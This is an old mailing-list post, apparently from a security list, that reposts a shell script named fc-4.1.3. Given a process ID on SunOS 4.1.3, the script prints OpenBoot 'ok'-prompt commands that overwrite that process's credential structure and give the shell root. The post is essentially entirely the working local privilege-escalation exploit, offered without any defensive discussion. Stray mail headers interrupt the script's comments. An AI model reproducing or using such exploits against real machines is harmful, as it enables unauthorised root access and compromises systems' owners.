Re: Breaking in from the monitor at the console

[an100188 () anon penet fi (an100188 () anon penet fi)]

Oops, someone pointed out that the script was deleted by the anonymous
mail signature-remover.  Sorry about that.  Here's the script:
 
#!/bin/sh -  
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#
Content-Length: 916
X-Lines: 37
Status: O

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ $1x = x ]; then  
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure  
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a', you should see then see the following message:
        Type  'go' to resume
        ok  

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes:  
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0